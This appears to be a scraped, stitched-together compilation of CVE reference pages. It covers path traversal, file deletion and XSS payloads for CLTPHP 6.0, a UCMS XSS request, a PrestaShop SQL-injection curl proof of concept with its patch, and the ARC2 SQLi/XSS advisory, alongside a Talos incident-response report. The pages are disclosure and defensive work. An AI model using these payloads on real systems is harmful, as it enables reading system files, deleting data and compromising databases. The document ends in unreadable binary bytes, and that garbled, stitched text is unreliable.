CLTPHP <=6.0 is vulnerable to Directory Traversal.

Permalink

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Go to file

*   Go to file

*   Copy path
*   Copy permalink

Cannot retrieve contributors at this time

**CLTPHP <= 6.0 Path Traversal****Description**

    The system client did not handle the parameters correctly, resulting in path traversal.
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/admin/controller/Template.php 

Exploiting this vulnerability requires logging into the system.

payload:

    admin/template/edit?file=../../../../../../../../../../etc/passwd&type=../

CVE-2023-30265: HuBenVulList/CLTPHP6.0 Path Traversal.md at main · HuBenLab/HuBenVulList

CLTPHP <=6.0 is vulnerable to Improper Input Validation via application/admin/controller/Template.php.

\[CVE ID\]

CVE-2023-30269

\[PRODUCT\]

CLTPHP - <=6.0

\[VERSION\]

CLTPHP - <=6.0

\[PROBLEM TYPE\]

Improper Input Validation

\[DESCRIPTION\]

CLTPHP <=6.0 is vulnerable to Improper Input Validation via

CVE-2023-30269: CVE-2023-30269

**CLTPHP <= 6.0 Improper Input Validation 1****Description**

    The system client did not handle the parameters correctly, resulting in arbitrary file deletion.
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/admin/controller/Template.php 

Exploiting this vulnerability requires logging into the system.

payload:

    admin/template/imgDel 
    
    post：folder=../../../../../../../../../&filename=tmp/123
    

The method of writing output has been executed, but because the images directory does not exist by default, the exploit will fail. If the images directory exists, it can be exploited normally (linux platform). If it is in windows is not affected by the images directory, you can use the vulnerability normally

CVE-2023-30269: HuBenVulList/CLTPHP6.0 Improper Input Validation 1.md at main · HuBenLab/HuBenVulList

CLTPHP <=6.0 is vulnerable to Cross Site Scripting (XSS) via application/home/controller/Changyan.php.

Permalink

Cannot retrieve contributors at this time

**CLTPHP <= 6.0 Reflected cross-site scripting(XSS)****Description**

    The system client does not handle GET parameters correctly, resulting in reflected cross-site scripting (XSS).
    

**Vendor Homepage**

    https://gitee.com/chichu/cltopen/
    https://www.cltphp.com/
    

**Author****Proof of Concept**

File:application/home/controller/Changyan.php 

payload:

    ?callback=<script>alert(%27Vulnerable%27);</script>

CVE-2023-30267: HuBenVulList/CLTPHP6.0 Reflected cross-site scripting(XSS).md at main · HuBenLab/HuBenVulList

An issue was discovered in Fighting Cock Information System 1.0, which uses default credentials, but does not force nor prompt the administrators to change the credentials.

\> \[VulnerabilityType Other\]

\>> Default Credentials

\---------------------------------------------------------------

\> \[Affected Component\]

\>> Login page

\---------------------------------------------------------------

\> \[Attack Type\]

\>> Remote

\---------------------------------------------------------------

\> \[Impact Escalation of Privileges\]

\>> true

\---------------------------------------------------------------

\> \[Attack Vectors\]

\>> Admin:Admin credentials posted publicly and does not

\>> force a change upon login

\---------------------------------------------------------------

\> \[Discoverer\]

\>> Hopscotch, Chez, Killa\_Crab

\---------------------------------------------------------------

\> \[Reference\]

\>> https://www.sourcecodester.com/php/12824/fighting-cock-information-system.html

\---------------------------------------------------------------

\> \[Vendor of Product\]

\>> FIghting Cock Information System, crhisjelo

\---------------------------------------------------------------

\> \[Affected Product Code Base\]

\>> Fighting Cock Information System All versions

\---------------------------------------------------------------

CVE-2022-39989: CVE-2022-39989

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter.

Wednesday, April 26, 2023 08:04

**Web shell usage spikes in Q1 compared to previous quarters, correlating with higher instances of exploitation of public-facing applications.**

In a novel increase compared to previous quarters, Cisco Talos Incident Response (Talos IR) reports that web shells were the most-observed threat in the first quarter of 2023, comprising nearly a fourth of the incidents Talos IR engaged in. The functionality of these web shells and the specific vulnerabilities and weaknesses in the platforms they targeted varied. Although each web shell had its own sets of basic functions, when there were multiple web shells present in a single engagement, threat actors chained them together to provide a more flexible toolkit for spreading access across the network. This demonstrates the skills actors have in combining multiple means of accesses and tools and increases the liklihood that they will be able to deploy additional malware or obtain sensitive and private information.

Ransomware made up a smaller portion of threats observed this quarter than in the past, from 20% to around 10%. Given that Talos IR observed a recent surge of ransomware incidents at the end of the quarter that did not close off, this decrease does not necessarily signify a decline in general ransomware activity as much as it is a reflection of activity seen against Talos IR’s customer base. However, ransomware and pre-ransomware incidents combined made up more than 20 percent of threats observed. While it can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place, many of the pre-ransomware engagements featured activity associated with prominent ransomware groups, such as Vice Society. We note that in this quarter, particularly in an aforementioned Vice Society engagement, swift action from defenders at victim organizations as well as Talos IR helped mitigate malicious activity before encryption could occur.

This quarter also featured previously seen commodity loaders, such as Qakbot. In engagements this quarter, Qakbot leveraged malicious OneNote documents, consistent with an uptick in various malware distributing weaponized Microsoft Office OneNote attachments. This is evidence of an ongoing trend of threat actors experimenting with file types that do not rely on macros to deliver malicious payloads following Microsoft’s move to start disabling macros by default in its applications in July 2022.

In 45 percent of engagements, attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet.

**Targeting**

Health care and public health was the most targeted vertical this quarter, closely followed by the retail and trade, real estate and food services/accommodation sectors, including hospitality.

**Web shell usage spike, featuring activity from FIN13**

Since January 2023, Talos IR observed an increase in web shell usage from 6% of all threats last quarter to now comprising nearly 25% of all threats. Web shells are malicious scripts that enable threat actors to compromise web-based servers exposed to the internet. This quarter, Talos observed threat actors using publicly available or modified web shells coded in various languages, including PHP, ASP.NET and Perl. After leveraging web shells to establish a foothold and gain persistent access to a system, adversaries remotely executed arbitrary code or commands, moved laterally within the network, or delivered additional malicious payloads. In many of these web shell incidents, adversaries relied heavily on web shell code sourced from publicly available GitHub repositories. This finding is also in line with a trend observed from Talos IR engagements from July to September 2022 (Q3 2022), where adversaries used a variety of open-source tools and scripts hosted on GitHub repositories to support operations across multiple stages of the attack lifecycle.

In one cluster of web shell activity, Talos observed targeting patterns and tactics, techniques and procedures (TTPs) potentially associated with the FIN13 cybercriminal threat actor, a significant finding in Talos IR engagements given FIN13’s targeted behavior. The web shells with known FIN13 TTPs have varying levels of functionality which include allowing queries to Microsoft SQL (MS-SQL) instances, creating reverse shell connection(s) to external IP addresses, and executing PHP scripts which can be used as a proxy to connect to other services. Consistent with public reporting on FIN13, Talos IR observed a PHP-based web shell (“404.php”) that took an IP or DNS entry and a port and attempted to create a proxy connection. The second web shell (“ms3.aspx”) was Windows-based and allowed SQL connections to an internal server and, if successful, results would be rendered in the browser. The third was another PHP-based web shell (“re.php”) that conducted port scans and created an outbound socket to respond/exfiltrate data to the attacker. This specific web shell contained a hardcoded IP address which resolved to cloud service provider DigitalOcean. The final web shell (“tx.asp”) was a Windows-based web shell that used “wscript.shell” and exec() to run commands rendered to the screen via an HTML document. While each web shell on its own had basic functionality, by chaining them together, the actor created a flexible toolkit for spreading their access across the network, while providing a proxy for exfiltrating sensitive data.

While the exact reason for this quarter’s increased appearance of web shells is unknown, their recent increased popularity may potentially be related to the ease of obtaining their code through open-source repositories. The availability of and easy access to open-source web shell code, paired with systems that may be publicly exposed or have poorly managed patching, make the use of web shells a lucrative option.

**Ransomware**

Ransomware made up a much smaller portion of threats this quarter, from 20% of threats to 10%. Looking ahead, there was a recent spike in ransomware engagements which we expect to level out again next quarter. Combined, ransomware and pre-ransomware incidents made up over 20 percent of threats observed.

In a Phobos ransomware engagement, a threat that Talos IR has responded to since 2020, the initial access likely involved remote desktop protocol (RDP). The adversary deployed a file named “mimidrv.sys," which is a signed Windows kernel mode software driver meant to be used with the Mimikatz executable. Talos IR also identified seven startup items that included downloading the ransomware executable, “Fast.exe.” This is a common persistence technique that followed activity where the adversary made modifications to the registry on the customer’s Amazon Relational Database Service (RDS) server. Upon encryption, attackers encrypted the files, appending them with the “.faust” extension and dropped a ransom note on the targeted systems.

This quarter also featured the Daixin ransomware, a newer ransomware-as-a-service (RaaS) family that Talos IR had never seen before in an engagement. Daixin, which first emerged in June 2022, typically involves affiliates gaining access to victim systems through virtual private networks (VPN) servers or by exploiting unpatched vulnerabilities, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA). In a Daixin ransomware engagement, the affiliate modified registry values, mapped network shares, and ran randomly named BAT files as services on the system. Talos IR also identified the Impacket toolset, a collection of Python classes for working with different network protocols, and a PowerShell script loading a Cobalt Strike payload which subsequently launched a Cobalt Strike shellcode listening on port 4444.

We assess that the recent law enforcement efforts to disrupt ransomware actors will create space for new groups to emerge, consistent with a pattern that has been ongoing for years. In January 2023, the U.S. Department of Justice announced a months-long disruption campaign against the Hive ransomware group. The FBI, along with foreign law enforcement partners, seized Hive servers after entering its networks and capturing keys to decrypt its software, effectively disrupting operations. We have not observed Hive ransomware in Talos IR engagements since August 2022, a likely indication that Hive operations have ceased while former members possibly look to join other groups or rebrand under new names.

**Malicious OneNote documents continue to be leveraged in engagements this quarter**

The Qakbot commodity loader was observed across engagements this quarter leveraging ZIP files containing malicious OneNote documents, consistent with endpoint telemetry and public reporting on threats leveraging OneNote documents in phishing emails starting at the end of 2022 and early 2023. In one Qakbot engagement, a ZIP file ("Inv\_02\_02\_#3.zip") was detected as Qakbot and contained a malicious OneNote document which attempted to lure a user to click “open” containing a malicious embedded URL.

While Talos IR did not respond to any Emotet incidents this quarter, Emotet reemerged in March 2023, resuming its spam operations after a months-long hiatus. In a relatively short period, Emotet modified its infection chain several times to maximize the likelihood of successfully infecting victims. By mid-March, Emotet had switched to distributing malicious OneNote documents, highlighting the ways in which threat actors will continue to identify and quickly implement updated delivery methods to infect victims.

**Initial vectors**

This quarter featured 45 percent of engagements where attackers exploited public-facing applications to establish initial access, a significant increase from 15 percent the previous quarter. In many of these engagements, web shell usage contributed to this uptick where adversaries were attempting to compromise web-based servers exposed to the internet. Valid accounts and/or accounts with weak passwords or single-factor authentication also helped facilitate initial access where an adversary was leveraging compromised credentials.

Several known vulnerabilities contributed to adversaries gaining initial access via exploiting public-facing applications. In one incident, Talos IR identified activity consistent with exploitation of the WordPress vulnerability, tracked as CVE-2021-24867, in AccessPress Plugin and Theme. As a result, Talos IR identified approximately 20 different web shells and/or website defacements, likely from multiple threat actors identifying and exploiting this older flaw.

In another web shell engagement, Talos IR identified a vulnerable version of Magento (Adobe Commerce) version 2.4.2 that was operating in the Kubernetes deployment at the time of exploitation. Talos IR identified a total of nine known vulnerabilities for this version of the software, not including extensions. Talos IR recommends upgrading all instances of Magento to the latest available version, and routinely checking for vulnerable outdated extension versions that need patching or removed completely to reduce the available attack surface.

**Security weaknesses**

The lack of multi-factor authentication (MFA) remains one of the biggest impediments for enterprise security. Nearly 30 percent of engagements involved organizations that either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection response (EDR) solutions or VPNs. To help minimize initial access vectors, Talos IR recommends disabling VPN access for all accounts that are not using MFA.

The increase in web shell engagements highlights the need for more vigilance in helping to prevent web shells. Talos provides the following recommendations:

*   Routinely update and patch all software and operating systems to identify and remediate vulnerabilities or misconfigurations in web applications and web servers.
*   In addition to patching, perform general system hardening, including removing services or protocols where they are unnecessary and being aware of all systems exposed directly to the internet.
*   Disable unnecessary php functions in your “php.ini”, such as eval(), exec(), peopen(), proc\_open() and passthru().
*   Frequently audit and review logs from web servers for unusual or anomalous activity.

**Top-observed MITRE ATT&CK techniques**

The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. Please note, this is not an exhaustive list.

Key findings from the MITRE ATT&CK framework include:

*   Exploitation of public-facing applications was the top observed initial access technique, with the increased web shell activity likely contributing to this significant observation.
*   PowerShell is routinely used by adversaries to support a multitude of threats. We continued to observe high usage of PowerShell, in addition to a number of other scripting languages, including Python, Unix shell, and Windows command shell, which enabled web shell execution.
*   The open source red-teaming security toolkit Mimikatz was used to support nearly 60 percent of ransomware and pre-ransomware engagements this quarter. Consistently observed across previous quarters, Mimikatz is a widely used post-exploitation tool used to steal login IDs, passwords, and authentication tokens from compromised Windows systems.

Tactic 

Technique 

Example 

Initial Access (TA0001) 

T1190 Exploit Public-Facing Application  

Attackers successfully exploited a vulnerable application that was publicly exposed to the internet 

Reconnaissance (TA0043) 

T1592 Gather Victim Host Information 

Text file contains details about host 

Persistence (TA0003) 

T1505.003 Server Software Component: Web Shell  

Adversaries deployed web shells against web-based servers 

Execution (TA0002) 

T1059.001 Command and Scripting Interpreter: PowerShell  

Executes PowerShell code to retrieve information about the client's Active Directory environment 

Discovery (TA0007) 

T1046 Network Service Scanning   

Use a network or port scanner utility  

Credential Access (TA0006) 

T1003 OS Credential Dumping 

Deploy Mimikatz and publicly available password lookup utilities 

Privilege Escalation (TA0004)  

1484 Domain Policy Modification

Modify GPOs to execute malicious files  

Lateral Movement (TA0008) 

T1021.001 Remote Desktop Protocol  

Adversary made attempts to move laterally using Windows Remote Desktop 

Defense Evasion (TA0005) 

T1027 Obfuscated Files or Information 

Use base64-encoded PowerShell scripts 

Command and Control (TA0011) 

T1105 Ingress Tool Transfer  

Adversaries transfer/download tools from an external system 

Impact (TA0040) 

T1486 Data Encrypted for Impact  

Deploy Hive ransomware and encrypt critical systems 

Exfiltration (TA0010) 

T1567 Exfiltration Over Web Service 

Use legitimate external web service to  system information  

Collection (TA0009) 

T1560.001 Archive Collected Data 

Adversary leveraged xcopy on Windows to copy files  

Software/Tool 

S0002 Mimikatz 

Use Mimikatz to obtain account logins and passwords

Quarterly Report: Incident Response Trends in Q1 2023

A vulnerability was found in UCMS 1.6.0. It has been classified as problematic. This affects an unknown part of the file saddpost.php of the component Column Configuration. The manipulation of the argument strorder leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227481 was assigned to this vulnerability.

Vulnerability description： UCMS 1.6 was discovered to contain a cross-site scripting (XSS) vulnerability via the "Column configuration"(栏目配置)-"Variable name module"(变量名模块) under the Site Management page.

Vulnerability recurrence： The filtering of $strorder is not strict in the adding method of the file \ucms_1.6\ucms\sadmin\saddpost

    POST /ucms_1.6/ucms/index.php?do=sadmin_saddpost HTTP/1.1
    Host: 10.211.55.7
    Proxy-Connection: keep-alive
    Content-Length: 531
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.211.55.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.211.55.7/ucms_1.6/ucms/index.php?do=install
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: admin_5a298d=admin; psw_5a298d=11588e274d6c1b23f3997fb435480270; token_5a298d=842df413; PHPSESSID=o3ppmlrbn6epa7v9otb6qlp0b5
    
    strcid=0&uuu_token=842df413&strname%5B%5D=%E7%AB%99%E7%82%B9%E6%A0%87%E9%A2%98&inputkind%5B%5D=1&strorder%5B%5D=5&strname%5B%5D=%E5%85%B3%E9%94%AE%E8%AF%8D&inputkind%5B%5D=1&strorder%5B%5D=%E6%8F%8F%E8%BF%B0%3Cstyle+onload%3Dalert%281%29%3E &strname%5B%5D=%E6%8F%8F%E8%BF%B0%3Cstyle+onload%3Dalert%281%29%3E&inputkind%5B%5D=2&strorder%5B%5D=15&strname%5B%5D=logo%E5%9B%BE%E7%89%87&inputkind%5B%5D=5&strorder%5B%5D=20&strname%5B%5D=%E5%A4%87%E6%A1%88%E5%8F%B7&inputkind%5B%5D=1&strorder%5B%5D=25&strname%5B%5D=%E7%BB%9F%E8%AE%A1%E4%BB%A3%E7%A0%81&inputkind%5B%5D=2&strorder%5B%5D=30

CVE-2023-2294: UCMS1.6/README.md at main · yztale/UCMS1.6

SQL injection vulnerability found in PrestaShop askforaquote v.5.4.2 and before allow a remote attacker to gain privileges via the QuotesProduct::deleteProduct component.

In the module “Ask for a Quote - Convert to order, messaging system” (askforaquote) for PrestaShop, an anonymous user can perform SQL injection before 5.4.3. Release 5.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-27843
*   **Published at**: 2023-04-25
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: askforaquote
*   **Impacted release**: < 5.4.3
*   **Product author**: Presta FABRIQUE
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 5.4.2, a sensitive SQL call in class QuotesProduct::deleteProduct() can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted “item\_id” variable.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Technical and personal data leaks
*   Obtain admin access
*   Remove all data of the linked PrestaShop
*   Display sensitives tables to front-office to unlock potential admin’s ajax scripts of modules protected by token on the ecosystem

**Proof of concept**

    curl -v -X POST -d 'action=delete_from_cart&item_id=2_9%3Bdelete+from+0test+where+1%23' 'https://preprod.XXXXX/module/askforaquote/QuotesCart'
    

**Patch**

    --- v5.4.1/modules/askforaquote/classes/QuotesProduct.php
    +++ v5.4.2/modules/askforaquote/classes/QuotesProduct.php
    @@ -160,9 +160,9 @@ class QuotesProductCart extends ObjectMo
             $row = Db::getInstance()->getRow(
                 'SELECT qp.`quantity`, qp.`id_product_attribute`
                 FROM `' . _DB_PREFIX_ . 'quotes_product` qp
    -            WHERE qp.`id_product` = ' . pSQL($id_product) . '
    +            WHERE qp.`id_product` = ' . (int) $id_product . '
                 AND qp.`id_quote` LIKE "' . pSQL($id_quote) . '"
    -            AND qp.`id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND qp.`id_product_attribute` = ' . (int) $id_product_attribute
             );
    @@ -211,16 +211,16 @@ class QuotesProductCart extends ObjectMo
                     }
                 }
     
    -            if ((int)$current_qty < 0) {
    +            if ((int) $current_qty < 0) {
                     return $this->deleteProduct($id_product, $row['id_product_attribute']);
                 }
     
    -            //update current product in cart
    +            // update current product in cart
                 $update = Db::getInstance()->execute(
                     'UPDATE `' . _DB_PREFIX_ . 'quotes_product`
    -                SET `quantity` = ' . pSQL($current_qty) . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    -                WHERE `id_product` = ' . pSQL($id_product) . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    -                '" AND `id_product_attribute` = ' . pSQL($id_product_attribute) . '
    +                SET `quantity` = ' . (int) $current_qty . ', `date_upd` = "' . pSQL(date('Y-m-d H:i:s', time())) . '"
    +                WHERE `id_product` = ' . (int) $id_product . ' AND `id_quote` LIKE "' . pSQL($id_quote) .
    +                '" AND `id_product_attribute` = ' . (int) $id_product_attribute . '
                     LIMIT 1'
                 );
    @@ -543,15 +542,15 @@ class QuotesProductCart extends ObjectMo
             /* Product deletion */
             $result = Db::getInstance()->execute(
                 'DELETE FROM `' . _DB_PREFIX_ . 'quotes_product`
    -            WHERE `id_product` = ' . pSQL($id_product) . '
    +            WHERE `id_product` = ' . (int) $id_product . '
                 AND `id_quote` LIKE "' . pSQL($this->id_quote) . '"
    -            AND `id_product_attribute` = ' . pSQL($id_product_attribute)
    +            AND `id_product_attribute` = ' . (int) $id_product_attribute
             );
     
             if ($result) {
                 return true;
             }
            //$this->update(true);
     
             return false;
         }
    

**Other recommandations**

*   It’s recommended to upgrade the module beyond 5.4.2.
*   Upgrade PrestaShop beyond 1.7.8.8 (and 8.0.1) to disable multiquery executions (separated by “;”).
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2022-10-09

Issue discovered during a code review by 202 ecommerce and Touchweb

2023-02-12

Request a CVE ID

2023-02-28

Contact the author

2023-03-01

The author confirm the issue

2023-03-17

Propose 30 days before disclosure

2023-03-19

The author confirm a fix release in progress

2023-03-22

The author published the release 5.4.2

2023-04-25

Publication of this security advisory

**Links**

*   PrestaShop addons product page
*   National Vulnerability Database

CVE-2023-27843: [CVE-2023-27843] Improper neutralization of a SQL parameter in askforaquote module for PrestaShop

ARC (aka ARC2) through 2011-12-01 allows reflected XSS via the end_point.php query parameter in an output=htmltab action.

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes - Permalink - Comments

Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, providing RDF and SPARQL functionalities to PHP applications and working with MySQL as backend. Found vulnerabilities include SQL Injection and XSS.

ARC v2011-12-01 Multiple vulnerabilities

 Name              ARC2 v2011-12-01 Multiple vulnerabilities
 Systems Affected  ARC2 v2011-12-01
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            https://github.com/semsol/arc2
 Advisory          http://www.ush.it/team/negator/hack-arc\_2011-12-01/adv.txt
 Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
 Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. 
It's free, open-source, easy to use, and runs in most web server 
environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular the SPARQL+ 
Endpoint.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability 
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples into a mySQL database and uses a translator from 
SPARQL and SQL. To improve debugging of the application the developer 
has included comments that contain the query string value. It's possible
to Inject SQL commands on these comments if data passed is into a SPARQL
WHERE clause.

In the "getTriplePatternSQL()" function, "ARC2\_StoreSelectQueryHandler
.php" file, the query sent to MySQL is automatically debugged (without 
the ability to conditionally disable such feature) plugging comments 
containing the pattern's "S P O" (Subject, Predicate, Object; the 
semantic web triple concept) values.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PREFIX iam: <http://x>
SELECT \* WHERE {
   ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--" . 
}
LIMIT 100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

SELECT
  T\_0\_0\_0.s AS \`user\`, 
    T\_0\_0\_0.s\_type AS \`user type\`
FROM arc\_tests\_triple T\_0\_0\_0
WHERE (T\_0\_0\_0.p = 0) /\*FIX-IT http://xuser \*/
  AND (T\_0\_0\_0.o = 0) /\*FIX-IT lol\*/ OR (SELECT sleep(5))=1-- \*/
LIMIT 0,100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$query = 'PREFIX iam: <http://x>
 SELECT \* WHERE {
  ?user iam:user "lol\*/ OR (SELECT sleep(5))=1--".?password iam:hasPassw
  ord "password" .
 } LIMIT 100';
$store->setUp();
$store->query($query, 'rows')

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx
>%0D%0ASELECT+\*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol\*%2F+OR+%28SELE
CT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&sho
w\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector 
(AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in ARC version 
v2011-12-01 endpoint function.

The GET variable "query" is reflected in page without proper encoding 
when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<div class="results">
 Could not properly handle "<script src=/lol.it/x><script>" in 
 ARC2\_SPARQLPlusParser
</div>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end\_point.php?query=<script+src%3D%2Flol.it%2Fx><
script>&output=htmltab&jsonp=&key=&show\_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, 
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the "ARC2\_StoreEndpoin
t.php" and other files as described by the commit ID 0a39922edaf6a72c5af
60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:
 - The name CVE-2012-5872 to Blind SQL Injection Vulnerability. 
 - The name CVE-2012-5873 to Reflected Cross Site Scripting 
   Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, 
which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site:http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012 

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, 
this information.

CVE-2012-5873: ush.it - a beautiful place

Medicine Tracker System in PHP 1.0.0 is vulnerable to Cross Site Scripting (XSS).

�Q짥LY��\*��(E}8Y~�2���B~U�iؠA���Yx��E?Nm�YP�s�9Z�O��q-���Oj�F{�(Q���(��$�b����PK�s��Y�&\\�Q��� �X '�.����6+���F��{���3!G�Q�:�p�z�S1��Ol� �g�ީě��ޟ\`8��$3�� t��י�2\*lO��P-8�l2�%���� �~�VB�X���Q����T���"���\`��S<���%�q�I� r����WRF3���^:W�}�%��>�V�n�å�\\�����$�s>d�΍���Bz��������u�F��m��~�û��r�A����M\[�(��.T^|��f�����>������&��)�t�朙1Dr�$au��s�-aD#�F���+p۟���ڝ�rhP�eq�Ds����dTRx�֚L�Y��Lu�T� b���,$HY� ����m�q�X�s� ����)���H�{ʰOO�,�D R�N�y\[�G������AP��m��%3�rZ��m@��E���ȟsu 噂��넁Px�1E�ȉ�(O(�\_5���|�Y�\`Pf�T3��^n'�l�Q66q<�j�����\[�0�8��q#XNʏ���m ���qJ�D�ځM��0�+�#�m��iܜ� ����|dJF=%��Q�ڛ8:�K���0�#\`� ��Y>8G4�S%�8����<����\\��6��.'��C��r������\*�E����/c�1�7 ��@-?�J��2t� ���$0\\�/9(C�{�k�e�l����Y-�e�\*���e�M�#p5t\[��������E�ʞ���u��oFk�?a�\]�����M�3 TY���ky�������{ٽG���7�i�d��lH��!Q���\[Dn�,J \\45���N�n���m��v��B�P������l�0Ձ����!�}\[��A�KW�9$���5˺�Lλ�E��/E�ҷ^��F��#��|�Kl�h�1{��T ��6bZI�䉘X��NN���%��7�dZ1x���;b�6Ac�>�Tu�e��!��$}��(��c,�u�Ѣ�r;k���N1�+3�zu\]�7����+?�\_�KOBr�g����=�� �?M���jߙ���\*��0GRE �a셪Jcȯ��n�/�r�S�,f�X QA�l�N��G�$�1Tq��ӥcJ��g���1g,�d�I���wo������z��޽�Z��ߜ�����\[�Es��\\�)�W�\\W���.g�